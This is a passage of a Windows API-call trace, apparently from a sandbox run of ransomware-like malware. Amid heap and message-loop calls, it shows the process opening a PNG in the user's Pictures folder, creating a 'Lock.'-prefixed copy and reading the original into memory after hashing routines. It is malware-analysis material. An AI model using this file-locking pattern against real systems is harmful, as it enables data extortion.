lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.463] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0254.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0254.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.464] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0254.464] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0254.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0254.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0254.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0254.464] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.464] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0254.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0254.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0254.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.465] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.465] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0254.465] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0254.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0254.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0254.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.465] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0254.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.465] CryptDestroyHash (hHash=0xaa5860) returned 1 [0254.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0254.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0254.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0254.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0254.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0254.466] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0254.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0254.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.466] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.466] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.466] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.466] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0254.467] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/-6 V-28Zs1i2mga0e.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\-6 v-28zs1i2mga0e.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0254.468] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.468] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0254.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0254.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0254.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.469] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0254.469] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0254.469] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0254.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0254.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0254.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0254.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0254.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0254.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.470] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0254.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0254.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0254.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0254.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0254.471] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/Lock.-6 V-28Zs1i2mga0e.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lock.-6 v-28zs1i2mga0e.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0254.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0254.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0254.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.472] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0254.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0254.473] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0254.473] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0254.473] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0254.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0254.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0254.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0254.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0254.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0254.475] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0254.475] ReadFile (in: hFile=0x1f8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0xf4a4, lpOverlapped=0x0) returned 1 [0254.477] ReadFile (in: hFile=0x1f8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0254.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf4a4) returned 0x24c7a50 [0254.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0254.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0254.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0254.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0254.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf4a4) returned 0x24d6f00 [0254.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0254.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.480] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0254.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0254.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf4a4) returned 0x24c7a50 [0254.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0254.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.480] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0254.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0254.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0254.481] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0254.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0254.481] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0254.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0254.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0254.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1758 [0254.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0254.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf4a4) returned 0x24c7a50 [0254.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.482] RtlAllocateHeap (HeapHandle=0x25c0000, 